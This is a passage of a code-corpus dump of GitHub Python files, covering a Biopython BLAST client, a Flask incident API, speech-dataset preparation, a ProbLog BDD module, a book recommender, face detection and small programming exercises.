None]\n\tmessage = _as_bytes(_urlencode(query))\n\n\trequest = _Request(url_base,message,{\"User-Agent\": \"BiopythonClient\"})\n\thandle = _urlopen(request)\n\n\trid, rtoe = _parse_qblast_ref_page(handle)\n\tparameters = [\n\t\t('ALIGNMENTS', alignments),\n\t\t('ALIGNMENT_VIEW', alignment_view),\n\t\t('DESCRIPTIONS', descriptions),\n\t\t('ENTREZ_LINKS_NEW_WINDOW', entrez_links_new_window),\n\t\t('EXPECT_LOW', expect_low),\n\t\t('EXPECT_HIGH', expect_high),\n\t\t('FORMAT_ENTREZ_QUERY', format_entrez_query),\n\t\t('FORMAT_OBJECT', format_object),\n\t\t('FORMAT_TYPE', format_type),\n\t\t('NCBI_GI', ncbi_gi),\n\t\t('RID', rid),\n\t\t('RESULTS_FILE', results_file),\n\t\t('SERVICE', service),\n\t\t('SHOW_OVERVIEW', show_overview),\n\t\t('CMD', 'Get'),]\n\tquery = [x for x in parameters if x[1] is not None]\n\tmessage = _as_bytes(_urlencode(query))\n\n\t# Poll NCBI until the results are ready. Use a backoff delay from 2 - 120 second wait\n\tdelay = 2.0\n\tprevious = time.time()\n\twhile True:\n\t\tcurrent = time.time()\n\t\twait = previous + delay - current\n\t\tif wait > 0:\n\t\t\ttime.sleep(wait)\n\t\t\tprevious = current + wait\n\t\telse:\n\t\t\tprevious = current\n\t\tif delay + .5 * delay <= 120:\n\t\t\tdelay += .5 * delay\n\t\telse:\n\t\t\tdelay = 120\n\n\t\trequest = _Request(url_base,message,{\"User-Agent\": \"BiopythonClient\"})\n\t\thandle = _urlopen(request)\n\t\tresults = _as_string(handle.read())\n\n\t\t# Can see an \"\\n\\n\" page while results are in progress,\n\t\t# if so just wait a bit longer...\n\t\tif results == \"\\n\\n\":\n\t\t\tcontinue\n\t\t# XML results don't have the Status tag when finished\n\t\tif \"Status=\" not in results:\n\t\t\tbreak\n\t\ti = results.index(\"Status=\")\n\t\tj = results.index(\"\\n\", i)\n\t\tstatus = results[i + len(\"Status=\"):j].strip()\n\t\tif status.upper() == \"READY\":\n\t\t\tbreak\n\n\treturn (results)","repo_name":"Aniket-Bhagat/Computing_tools_10","sub_path":"Biopython_(Blastx)/blastx_biopython.py","file_name":"blastx_biopython.py","file_ext":"py","file_size_in_byte":6555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"18970350182","text":"from flask import jsonify,request,json, abort\nfrom . methods import IncidentList\nfrom . 
models import Models \nfrom datetime import datetime\n\ninciden = IncidentList()\n\ndef report_an_incident():\n\tdata = request.get_json()\n\tif not data or not data.get('createdBy') or not data.get('location') \\\n\tor not data.get('status') or not data.get('incident_type') or not data.get('images') \\\n\tor not data.get('videos') or not data.get('comment'):\n\t\tabort(400)\n\t\t#return jsonify({\"message\" : \"all fields are empty\"}),400\n\n\tcreatedBy,location,status,incident_type,images,videos,comment = \\\n\tdata.get('createdBy'),data.get('location'),data.get('status'), \\\n\tdata.get('incident_type'),data.get('images'),data.get('videos'), \\\n\tdata.get('comment')\n\n\tincident_id = inciden.generate_incident_id()\n\n\tcreatedOn = datetime.now().strftime('%d%m%y %H%M')\n\n\tnew_incident = Models(incident_id, createdOn, createdBy, location, status, incident_type, images, videos, comment)\n\tif location == \"\" or createdBy == '':\n\t\treturn jsonify({\"message\": \"location and createdBy can not be empty\"}),400\n\n\tinciden.add_an_incident(new_incident)\n\n\treturn jsonify({\"incident\" : inciden.incident_list[-1]}),201\n\ndef fetch_all_redflags():\n\treturn jsonify({\"red-flags\" : inciden.get_all_incidents()}),200\n\ndef fetch_specific_redflag(redflag_id):\n\tif not inciden.get_specific_incident(redflag_id):\n\t\treturn jsonify({\"message\" : \"No redflag with that id found\"}),401\n\n\treturn jsonify({\"incident\" : inciden.get_specific_incident(redflag_id)}),200\n\ndef edit_location_of_redflag(redflag_id):\n\tredflag = inciden.get_specific_incident(redflag_id)\n\tif redflag:\n\t\tlocation = request.get_json()['location']\n\t\tnew_location = location\n\t\tredflag[0]['location'] = new_location\n\t\treturn jsonify({\"Incident\" : redflag}),200\n\n\treturn jsonify({\"Error\" : \"No incident with that id\"}),401\n\ndef edit_comment_of_redflag(redflag_id):\n\tredflag = inciden.get_specific_incident(redflag_id)\n\tif redflag:\n\t\tcomment = request.get_json()['comment']\n\t\tnew_comment = comment\n\t\tredflag[0]['comment'] = new_comment\n\t\treturn jsonify({\"Incident\" : redflag}),200\n\n\treturn jsonify({\"Error\" : \"No incident with that id\"}),401\n\n\ndef delete_an_incident(id):\n\tfor redflag in inciden.incident_list:\n\t\tif redflag['incident_id'] == id:\n\t\t\tinciden.incident_list.remove(redflag)\n\t\t\treturn jsonify({\"message\": \"incident is now removed\"}),200\n\treturn jsonify({\"Error\": \"The incident you're looking for was not found\"}),401","repo_name":"MUGABA/IREpoterv1","sub_path":"api/Incidents/contrals.py","file_name":"contrals.py","file_ext":"py","file_size_in_byte":2433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
{"seq_id":"70585606993","text":"## a code to make TIMIT, L2-arctic, and Speechocean762 utterance list into csv files\nimport json\nimport os\nimport re\n\nfrom datasets import load_dataset\n\n# make TIMIT utterance list into csv files\nPATH = \"/PATH_TO_DATA/timit/TIMIT/\"\ntimit_train = open(\"./timit_train.csv\", \"w\")\ntimit_test = open(\"./timit_test.csv\", \"w\")\n\nfor r, d, f in os.walk(PATH):\n    d.sort()\n    f.sort()\n    for file in f:\n        if \".PHN\" in file:\n            name = file.split(\".PHN\")[0]\n            audio = name + \".WAV\"\n            text = name + \".TXT\"\n\n            if \"TEST\" in r:\n                print(os.path.join(r, audio), os.path.join(r, file), os.path.join(r, text), sep=\",\", file=timit_test)\n            else:\n                print(os.path.join(r, audio), os.path.join(r, file), os.path.join(r, text), sep=\",\", 
file=timit_train)\n\ntimit_train.close()\ntimit_test.close()\n\n\n# make L2-ARCTIC utterance list into csv files\nPATH = \"/PATH_TO_DATA/l2-arctic/\"\ntestset = [\"NJS\", \"TLV\", \"TNI\", \"TXHC\", \"YKWK\", \"ZHAA\"]\ndevset = [\"MBMPS\", \"THV\", \"SVBI\", \"NCC\", \"YDCK\", \"YBAA\"]\ntrainset = [\"BWC\", \"PNV\", \"EBVS\", \"HQTV\", \"ERMS\", \"HKK\", \"LXC\", \"ASI\", \"SKA\", \"RRBI\", \"ABA\", \"HJK\"]\narctic_train = open(\"./l2arctic_train.txt\", \"w\")\narctic_test = open(\"./l2arctic_test.txt\", \"w\")\nfor t in trainset + devset:\n for r, d, f in os.walk(PATH + t):\n f.sort()\n for file in f:\n if \"annotation\" in r:\n path = r.split(\"annotation\")[0]\n name = file.split(\".TextGrid\")[0]\n arctic_train.write(\n path + \"wav/\" + name + \".wav\" + \"\\t\" + path + \"annotation/\" + file + \"\\t\" + path + \"transcript/\" + name + \".txt\" + \"\\n\"\n )\n\nfor t in testset:\n for r, d, f in os.walk(PATH + t):\n f.sort()\n for file in f:\n if \"annotation\" in r:\n path = r.split(\"annotation\")[0]\n name = file.split(\".TextGrid\")[0]\n arctic_test.write(\n path + \"wav/\" + name + \".wav\" + \"\\t\" + path + \"annotation/\" + file + \"\\t\" + path + \"transcript/\" + name + \".txt\" + \"\\n\"\n )\n\narctic_train.close()\narctic_test.close()\n\n\n# make SPEECHOCEAN762 utterance list into csv files\nSPEECH_OCEAN_PATH = \"/PATH_TO_DATA/INTERSPEECH/speechocean762/\"\nTRAIN_SCORE_PATH = SPEECH_OCEAN_PATH + \"train/all-info.json\"\nTRAIN_WAV_PATH = SPEECH_OCEAN_PATH + \"train/wav.scp\"\nTEST_SCORE_PATH = SPEECH_OCEAN_PATH + \"test/all-info.json\"\nTEST_WAV_PATH = SPEECH_OCEAN_PATH + \"test/wav.scp\"\nRSC_SCORES_DETAIL = SPEECH_OCEAN_PATH + \"resource/scores-detail.json\"\nRSC_SCORES = SPEECH_OCEAN_PATH + \"resource/scores.json\"\nRSC_TEXT_PHONE = SPEECH_OCEAN_PATH + \"resource/text-phone\"\nwith open(TRAIN_SCORE_PATH, \"r\") as f:\n train_scores = json.load(f)\nwith open(TEST_SCORE_PATH, \"r\") as f:\n test_scores = json.load(f)\nwith open(RSC_SCORES_DETAIL, \"r\") as f:\n detail_scores = json.load(f)\nwith open(RSC_SCORES, \"r\") as f:\n scores = json.load(f)\n\ntrain_wav_path = load_dataset(\"csv\", data_files=TRAIN_WAV_PATH, delimiter=\"\\t\", column_names=[\"id\", \"path\"], split=\"train\")\ntest_wav_path = load_dataset(\"csv\", data_files=TEST_WAV_PATH, delimiter=\"\\t\", column_names=[\"id\", \"path\"], split=\"train\")\ntrain_wav_dict = {}\nfor i in range(len(train_wav_path)):\n idx = str(train_wav_path[i][\"id\"])\n train_wav_dict[idx] = train_wav_path[i][\"path\"]\ntest_wav_dict = {}\nfor i in range(len(test_wav_path)):\n idx = str(test_wav_path[i][\"id\"])\n test_wav_dict[idx] = test_wav_path[i][\"path\"]\n\nocean_train = open(\"./speechocean_train.csv\", \"w\")\nocean_test = open(\"./speechocean_test.csv\", \"w\")\n\nprint(\n \"ID\",\n \"accuracy\",\n \"completeness\",\n \"fluency\",\n \"prosodic\",\n \"total\",\n \"w_total\",\n \"w_accuracy\",\n \"w_stress\",\n \"p_accuracy\",\n \"text\",\n \"phone\",\n \"canon\",\n \"real\",\n \"path\",\n \"mispronunciations\",\n sep=\"|\",\n file=ocean_train,\n)\nfor utt in train_scores:\n phones_list = []\n canon_list = []\n real_list = []\n idx = 0\n w_total_list = []\n w_accuracy_list = []\n w_stress_list = []\n p_accuracy_list = []\n mis_list = []\n\n for word in train_scores[utt][\"words\"]:\n w_total_list.append(word[\"total\"])\n w_accuracy_list.append(word[\"accuracy\"])\n w_stress_list.append(word[\"stress\"])\n\n for phone in word[\"phones-accuracy\"]:\n p_accuracy_list.append(phone)\n for phone in word[\"phones\"]:\n 
phones_list.append(phone)\n canon_list.append(phone)\n real_list.append(phone)\n for mis in word[\"mispronunciations\"]:\n mis_list.append(mis)\n phone_no_stress = re.sub(\"[0-9]\", \"\", canon_list[idx + mis[\"index\"]])\n assert phone_no_stress == mis[\"canonical-phone\"]\n real_list[idx + mis[\"index\"]] = mis[\"pronounced-phone\"]\n idx = len(real_list)\n\n utt_no_zero = re.sub(\"^0+\", \"\", utt)\n\n print(\n utt,\n train_scores[utt][\"accuracy\"],\n round(train_scores[utt][\"completeness\"]),\n train_scores[utt][\"fluency\"],\n train_scores[utt][\"prosodic\"],\n train_scores[utt][\"total\"],\n w_total_list,\n w_accuracy_list,\n w_stress_list,\n p_accuracy_list,\n train_scores[utt][\"text\"],\n phones_list,\n canon_list,\n real_list,\n train_wav_dict[utt_no_zero],\n mis_list,\n sep=\"|\",\n file=ocean_train,\n )\n\n\nprint(\n \"ID\",\n \"accuracy\",\n \"completeness\",\n \"fluency\",\n \"prosodic\",\n \"total\",\n \"w_total\",\n \"w_accuracy\",\n \"w_stress\",\n \"p_accuracy\",\n \"text\",\n \"phone\",\n \"canon\",\n \"real\",\n \"path\",\n \"mispronunciations\",\n sep=\"|\",\n file=ocean_test,\n)\nfor utt in test_scores:\n phones_list = []\n canon_list = []\n real_list = []\n idx = 0\n w_total_list = []\n w_accuracy_list = []\n w_stress_list = []\n p_accuracy_list = []\n mis_list = []\n\n for word in test_scores[utt][\"words\"]:\n w_total_list.append(word[\"total\"])\n w_accuracy_list.append(word[\"accuracy\"])\n w_stress_list.append(word[\"stress\"])\n\n for phone in word[\"phones-accuracy\"]:\n p_accuracy_list.append(phone)\n for phone in word[\"phones\"]:\n phones_list.append(phone)\n canon_list.append(phone)\n real_list.append(phone)\n for mis in word[\"mispronunciations\"]:\n mis_list.append(mis)\n phone_no_stress = re.sub(\"[0-9]\", \"\", canon_list[idx + mis[\"index\"]])\n assert phone_no_stress == mis[\"canonical-phone\"]\n real_list[idx + mis[\"index\"]] = mis[\"pronounced-phone\"]\n idx = len(real_list)\n\n utt_no_zero = re.sub(\"^0+\", \"\", utt)\n\n print(\n utt,\n test_scores[utt][\"accuracy\"],\n round(test_scores[utt][\"completeness\"]),\n test_scores[utt][\"fluency\"],\n test_scores[utt][\"prosodic\"],\n test_scores[utt][\"total\"],\n w_total_list,\n w_accuracy_list,\n w_stress_list,\n p_accuracy_list,\n test_scores[utt][\"text\"],\n phones_list,\n canon_list,\n real_list,\n test_wav_dict[utt_no_zero],\n mis_list,\n sep=\"|\",\n file=ocean_test,\n )\n\nocean_train.close()\nocean_test.close()\n\nprint(\"- Finished making datasets for TIMIT, L2-ARCTIC, and SPEECHOCEAN762.\")\n","repo_name":"rhss10/joint-apa-mdd-mtl","sub_path":"data/create_datasets.py","file_name":"create_datasets.py","file_ext":"py","file_size_in_byte":7290,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"83"} +{"seq_id":"11061467893","text":"import os\n\nfrom rest_framework.authentication import BasicAuthentication\nfrom rest_framework.settings import api_settings\nfrom rest_framework.viewsets import ReadOnlyModelViewSet\nfrom rest_framework.mixins import DestroyModelMixin\n\nfrom onadata.apps.viewer.models.export import Export\nfrom onadata.apps.api.permissions import ExportDjangoObjectPermission\nfrom onadata.libs.renderers import renderers\nfrom onadata.libs.serializers.export_serializer import ExportSerializer\nfrom onadata.libs.authentication import (\n DigestAuthentication,\n TempTokenAuthentication,\n TempTokenURLParameterAuthentication)\nfrom onadata.libs.utils.logger_tools import response_with_mimetype_and_name\nfrom onadata.libs import 
filters\n\n\nclass ExportViewSet(DestroyModelMixin, ReadOnlyModelViewSet):\n    authentication_classes = (DigestAuthentication,\n                              TempTokenAuthentication,\n                              TempTokenURLParameterAuthentication,\n                              BasicAuthentication)\n    queryset = Export.objects.all()\n    renderer_classes = api_settings.DEFAULT_RENDERER_CLASSES + [\n        renderers.CSVRenderer,\n        renderers.CSVZIPRenderer,\n        renderers.KMLRenderer,\n        renderers.OSMExportRenderer,\n        renderers.SAVZIPRenderer,\n        renderers.XLSRenderer,\n        renderers.XLSXRenderer,\n        renderers.ZipRenderer\n    ]\n    serializer_class = ExportSerializer\n    filter_backends = (filters.ExportFilter,)\n    permission_classes = [ExportDjangoObjectPermission]\n\n    def retrieve(self, request, *args, **kwargs):\n        export = self.get_object()\n        filename, extension = os.path.splitext(export.filename)\n        extension = extension[1:]\n\n        return response_with_mimetype_and_name(\n            Export.EXPORT_MIMES[extension],\n            filename,\n            extension=extension,\n            file_path=export.filepath,\n            show_date=False)\n","repo_name":"childhelpline/myhelpline","sub_path":"onadata/apps/api/viewsets/export_viewset.py","file_name":"export_viewset.py","file_ext":"py","file_size_in_byte":1917,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"}
{"seq_id":"12909349782","text":"input = open(0)\n\nt = 0\nc = 0\nx = 1\n\n\ndef yes():\n    global t, c, x\n    if c in {20, 60, 100, 140, 180, 220}:\n        t += c * x\n\n\nfor line in input:\n    cmd = line.split()\n\n    if cmd[0] == \"noop\":\n        c += 1\n        yes()\n    else:\n        a = int(cmd[1])\n        c += 1\n        yes()\n        c += 1\n        yes()\n        x += a\n\nprint(t)\n","repo_name":"nexxeln/aoc-2022","sub_path":"day-10/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"83"}
{"seq_id":"28009237076","text":"from .core import transform\nfrom .dd_formula import DD, build_dd, DDManager\nfrom .errors import InstallError\nfrom .formula import LogicDAG\n\n# noinspection PyBroadException\n# noinspection PyUnresolvedReferences\ntry:\n    # noinspection PyPackageRequirements\n    import dd.autoref as bdd\nexcept Exception:\n    bdd = None\n\n\nclass BDD(DD):\n    \"\"\"A propositional logic formula consisting of and, or, not and atoms represented as a BDD.\"\"\"\n\n    def __init__(self, **kwdargs):\n        if bdd is None:\n            raise InstallError(\"The BDD library is not available.\")\n\n        DD.__init__(self, auto_compact=False, **kwdargs)\n\n    def _create_manager(self):\n        return BDDManager()\n\n    def get_atom_from_inode(self, node):\n        \"\"\"Get the original atom given an internal node.\n\n        :param node: internal node\n        :return: atom represented by the internal node\n        \"\"\"\n        return self.var2atom[self.get_manager().get_variable(node)]\n\n    @classmethod\n    def is_available(cls):\n        \"\"\"Checks whether the BDD library is available.\"\"\"\n        return bdd is not None\n\n\nclass BDDManager(DDManager):\n    \"\"\"\n    Manager for BDDs.\n    It wraps around the dd BDD module\n    \"\"\"\n\n    # noinspection PyUnusedLocal\n    def __init__(self, varcount=0, auto_gc=True):\n        \"\"\"Create a new BDD manager.\n\n        :param varcount: number of initial variables\n        :type varcount: int\n        :param auto_gc: use automatic garbage collection and minimization\n        :type auto_gc: bool\n        \"\"\"\n        DDManager.__init__(self)\n        self.varcount = 1\n        self.base = bdd.BDD()\n        self.ZERO = self.base.false\n        self.ONE = self.base.true\n\n    def add_variable(self, label=0):\n        if label == 0 or label > self.varcount:\n            self.varcount += 1\n            res = self.varcount\n        else:\n            res = label\n        
self.base.declare(\"v\" + str(res))\n return res\n\n def get_variable(self, node):\n \"\"\"Get the variable represented by the given node.\n\n :param node: internal node\n :return: original node\n \"\"\"\n # noinspection PyProtectedMember\n return self.base.var(node)\n\n def literal(self, label):\n return self.base.var(\"v\" + str(self.add_variable(label)))\n\n def is_true(self, node):\n return node.is_one()\n\n def true(self):\n return self.ONE\n\n def is_false(self, node):\n return node.is_zero()\n\n def false(self):\n return self.ZERO\n\n def conjoin2(self, r, s):\n return r & s\n\n def disjoin2(self, r, s):\n return r | s\n\n def negate(self, node):\n return ~node\n\n def same(self, node1, node2):\n # Assumes BDD library always reuses equivalent nodes.\n return node1 is node2\n\n def ref(self, *nodes):\n pass\n\n def deref(self, *nodes):\n pass\n\n def write_to_dot(self, node, filename):\n with open(filename, \"w\") as f:\n print(node.to_dot(), file=f)\n\n def _parse_expr(self, expr):\n # EXPR := VAR | \"TRUE\" | \"FALSE\" | ITE\n # ITE := \"ite\" \"(\" VAR \",\" EXPR \",\" EXPR \")\"\n # VAR := expression\n lexpr = len(expr)\n if expr.startswith(\"TRUE\"):\n res = \"TRUE\"\n pos = 4\n elif expr.startswith(\"FALSE\"):\n res = \"FALSE\"\n pos = 5\n elif expr.startswith(\"ite(\"):\n pos = 4\n var, rst = expr[pos:].split(\", \", 1)\n ift, pos1 = self._parse_expr(rst)\n iff, pos2 = self._parse_expr(rst[pos1:])\n res = (var, ift, iff)\n pos += pos1 + pos2 + len(var)\n elif expr.startswith(\"(~ \"):\n pos = 3\n sub, pos1 = self._parse_expr(expr[pos:])\n pos = pos + pos1 + 1\n res = (\"~\", sub)\n else:\n pos = 0\n while pos < lexpr and expr[pos] not in \" ,)\":\n pos += 1\n res = expr[:pos]\n while pos < lexpr and expr[pos] in \" ,)\":\n pos += 1\n\n return res, pos\n\n def _enum_paths(self, expr, weights, semiring, negated=False):\n if expr == \"TRUE\":\n if not negated:\n yield semiring.one()\n elif expr == \"FALSE\":\n if negated:\n yield semiring.one()\n elif type(expr) == str:\n v = int(expr[1:])\n wp, wn = weights[abs(v)]\n if v > 0:\n pass\n else:\n wp, wn = wn, wp\n if negated:\n yield wn\n else:\n yield wp\n elif len(expr) == 3:\n v = int(expr[0][1:])\n wp, wn = weights[abs(v)]\n if v > 0:\n pass\n else:\n wp, wn = wn, wp\n\n for p in self._enum_paths(expr[1], weights, semiring, negated=negated):\n if negated:\n yield semiring.plus(wn, p)\n else:\n yield semiring.times(wp, p)\n for p in self._enum_paths(expr[2], weights, semiring, negated=negated):\n if negated:\n yield semiring.plus(wp, p)\n else:\n yield semiring.times(wn, p)\n else:\n if negated:\n pall = semiring.one()\n else:\n pall = semiring.zero()\n for p in self._enum_paths(expr[1], weights, semiring, negated=not negated):\n if negated:\n pall = semiring.times(pall, p)\n else:\n pall = semiring.plus(pall, p)\n yield pall\n\n def wmc(self, node, weights, semiring):\n pall = semiring.zero()\n\n expr, _ = self._parse_expr(node.to_expr())\n\n for prob in self._enum_paths(expr, weights, semiring):\n pall = semiring.plus(prob, pall)\n return pall\n\n def wmc_literal(self, node, weights, semiring, literal):\n raise NotImplementedError(\"not supported\")\n\n def wmc_true(self, weights, semiring):\n return semiring.one()\n\n def __del__(self):\n pass\n\n\n@transform(LogicDAG, BDD)\ndef build_bdd(source, destination, **kwdargs):\n \"\"\"Build an SDD from another formula.\n\n :param source: source formula\n :param destination: destination formula\n :param kwdargs: extra arguments\n :return: destination\n \"\"\"\n return 
build_dd(source, destination, **kwdargs)\n","repo_name":"ML-KULeuven/problog","sub_path":"problog/bdd_formula_alt.py","file_name":"bdd_formula_alt.py","file_ext":"py","file_size_in_byte":6403,"program_lang":"python","lang":"en","doc_type":"code","stars":275,"dataset":"github-code","pt":"83"} +{"seq_id":"18707537341","text":"# 36 = 2^2 * 3^3\n\n# 2^0 * 3^0 = 1\n# 2^0 * 3^1 = 3\n# 2^0 * 3^2 = 9\n# 2^1 * 3^0 = 2\n# 2^1 * 3^1 = 6\n# 2^1 * 3^2 = 18\n# 2^2 * 3^0 = 4\n# 2^2 * 3^1 = 12\n# 2^2 * 3^2 = 36\n\n# 1+3+9+2+6+18+4+12+36 = 91\n\n# (2^0 + 2^1 + 2^2) * (3^0 + 3^1 + 3^2)\n# = (1 + 2 + 4) * (1 + 3 + 9)\n# = 7 *13\n# = 91\n\nclass AdvancedArithmetic(object):\n def divisorSum(n):\n raise NotImplementedError\n\ndef factorization(n):\n arr = []\n temp = n\n for i in range(2, int(-(-n**0.5//1))+1):\n if temp%i==0:\n cnt=0\n while temp%i==0:\n cnt+=1\n temp //= i\n arr.append([i, cnt])\n\n if temp!=1:\n arr.append([temp, 1])\n\n return arr\n\nclass Calculator(AdvancedArithmetic):\n def divisorSum(self, n):\n factored = factorization(n)\n result = 1\n for i, count in factored:\n tmp = 0\n for j in range(count+1):\n tmp += i**j\n result *= tmp\n return result\n\nn = int(input())\nmy_calculator = Calculator()\ns = my_calculator.divisorSum(n)\nprint(\"I implemented: \" + type(my_calculator).__bases__[0].__name__)\nprint(s)\n","repo_name":"hiromichinomata/hackerrank","sub_path":"30_days_of_code/019_interfaces.py","file_name":"019_interfaces.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"27480552708","text":"\nimport pymongo\n\nclient = pymongo.MongoClient()\ndb = client.movie_x\nmovies = db.movies.find({})\nfor movie in movies:\n year = movie.get('year', 0)\n actors = db.actors.find({'name': {'$in': movie.get('major_actor_list')}})\n for actor in actors:\n if actor.get('year', -1) < year:\n db.actors.update_one({\n '_id': actor['_id']\n }, {\n '$set': {\n 'year': year\n }\n }, upsert=False)","repo_name":"474873060/movie_spider","sub_path":"movie_crawl/mytest.py","file_name":"mytest.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"2823439579","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Apr 8 16:18:23 2018\n\n@author: Shamanth\n\"\"\"\n\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. 
pd.read_csv)\n\n# Input data files are available in the \"../input/\" directory.\n# For example, running this (by clicking run or pressing Shift+Enter) will list the files in the input directory\n\nbookDF=pd.read_csv('C:/Users/Shamanth/goodbooks-10k-master/books.csv')\nbookDF=bookDF.drop(['image_url','small_image_url','title','best_book_id','isbn','isbn13'],axis=1)\nratingsDF = pd.read_csv('C:/Users/Shamanth/goodbooks-10k-master/ratings.csv')\n\nlistOfDictonaries=[]\nindexMap = {}\nreverseIndexMap = {}\nptr=0;\ntestdf = ratingsDF\ntestdf=testdf[['user_id','rating']].groupby(testdf['book_id'])\nfor groupKey in testdf.groups.keys():\n tempDict={}\n\n groupDF = testdf.get_group(groupKey)\n for i in range(0,len(groupDF)):\n tempDict[groupDF.iloc[i,0]]=groupDF.iloc[i,1]\n indexMap[ptr]=groupKey\n reverseIndexMap[groupKey] = ptr\n ptr=ptr+1\n listOfDictonaries.append(tempDict)\n \nfrom sklearn.feature_extraction import DictVectorizer\ndictVectorizer = DictVectorizer(sparse=True)\nvector = dictVectorizer.fit_transform(listOfDictonaries)\n\nfrom sklearn.metrics.pairwise import cosine_similarity\npairwiseSimilarity = cosine_similarity(vector)\n\ndef printBookDetails(bookID):\n # print(\"Title:\", bookDF[bookDF['id']==bookID]['original_title'].values[0])\n #print(\"Author:\",bookDF[bookDF['userid']==bookID]['authors'].values[0])\n print(\"Printing Book-ID:\",bookID)\n print(\"=================++++++++++++++=========================\")\n\n\ndef getTopRecommandations(bookID):\n row = reverseIndexMap[bookID]\n print(\"------INPUT BOOK--------\")\n printBookDetails(bookID)\n print(\"-------RECOMMENDATIONS----------\")\n similarBookIDs = [printBookDetails(indexMap[i]) for i in np.argsort(pairwiseSimilarity[row])[-7:-2][::-1]]\n \nif __name__ == \"__main__\":\n getTopRecommandations(980)","repo_name":"ShamanthK/BookRecommendationSystem","sub_path":"Collaborative Filtering.py","file_name":"Collaborative Filtering.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"84"} +{"seq_id":"35985563370","text":"from django import forms\nfrom django.conf import settings\nfrom django.core.exceptions import ValidationError\nfrom django.forms import ModelForm\nfrom django.forms.widgets import CheckboxSelectMultiple\nfrom clinic.models import Doctor, SelfCertificationQuestion\nimport os\n\nclass DoctorForm(ModelForm):\n\tclass Meta:\n\t\tmodel = Doctor\n\t\tfields = ['name', 'credentials', 'languages', 'self_certification_questions']\n\t\twidgets = {\n\t\t\t'languages': CheckboxSelectMultiple(),\n\t\t\t'self_certification_questions': CheckboxSelectMultiple(),\n\t\t}\n\n\tdef clean_credentials(self):\n\t\tf = self.cleaned_data.get('credentials')\n\n\t\text = os.path.splitext(f.name)[-1].lower()\n\t\tif ext not in settings.ALLOWED_UPLOAD_EXTENSIONS:\n\t\t\traise ValidationError(\"This type of file is not allowed.\")\n\n\t\tif f.size > 20 * 1024 * 1024:\n\t\t\traise ValidationError(\"Proof of credentials must be less than 20MB.\")\n\n\t\treturn f\n\n\tdef clean_self_certification_questions(self):\n\t\tanswered = self.cleaned_data.get('self_certification_questions')\n\n\t\tunanswered_count = SelfCertificationQuestion.objects.exclude(id__in=answered.values_list('id', flat=True)).count()\n\t\tif unanswered_count > 0:\n\t\t\traise ValidationError(\"You must confirm all items.\")\n\n\t\treturn 
answered\n","repo_name":"tballantyne/medicam","sub_path":"clinic/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"84"}
{"seq_id":"6976530741","text":"import face_recognition\nimport cv2\n\n\n\nvideo_file_3min = \"Zypl_short.mp4\"\ncap = cv2.VideoCapture(video_file_3min)\ncounter =0 \n\nwhile True:\n    _,frame=cap.read()\n    frame = cv2.cvtColor(frame,cv2.COLOR_RGB2BGR)\n    face = face_recognition.face_locations(frame)\n    frame = cv2.cvtColor(frame,cv2.COLOR_RGB2BGR)\n\n    for i in face:\n        cv2.rectangle(frame,(i[3],i[0]),(i[1],i[2]),(255,0,255),2)\n\n\n    cv2.imshow(\"frame\",frame)\n    k=cv2.waitKey(1)\n    if k%256==27:\n        break\ncap.release()\ncv2.destroyAllWindows()\n# while True:\n#     success,frame = cap.read();\n\n#     frame = cv2.cvtColor(frame,cv2.COLOR_RGB2BGR)\n#     face = face_recognition.face_locations(frame)\n    \n    \n#     frame = cv2.cvtColor(frame,cv2.COLOR_RGB2BGR)\n    \n    \n#     counter +=1\n#     cv2.imshow(\"Test\",frame)\n#     k = cv2.waitKey(1)\n#     if k%256==27:\n#         break\n# print(\"number of detections: {} \".format(counter))\n# cap.release()\n# cv2.destroyAllWindows()","repo_name":"jsUser15/Zypl","sub_path":"face_rec.py","file_name":"face_rec.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"}
{"seq_id":"33438762833","text":"'''#1 find maximum and minimum of two numbers\r\n \r\na=5\r\nb=6\r\n\r\nif a>b:\r\n    print(a,\"is maximum and\", b, \"is minimum\")\r\nelse:\r\n    print(b,\"is maximum and\", a, \"is minimum\")\r\n\r\nprint(\"\\r\")\r\n#2 using max function\r\n\r\na=3\r\nb=5\r\n\r\nmaxm=max(a,b)\r\n\r\nprint(maxm)\r\nprint(\"\\r\")\r\n#3 creating a function\r\n\r\ndef maximum(a,b):\r\n    if a>b :\r\n        return a\r\n    else:\r\n        return b\r\n\r\na,b=8,9\r\n\r\nprint(maximum(a,b))\r\n'''\r\n#4 using lambda \r\n\r\na=4;b=8\r\n\r\nmaximum=lambda a,b: a if a>b else b\r\n\r\nprint(f'{maximum(a,b)} is maximum number')\r\n","repo_name":"Asmitazope/Python-Basic-Programs","sub_path":"max_min_Two_Num.py","file_name":"max_min_Two_Num.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"}
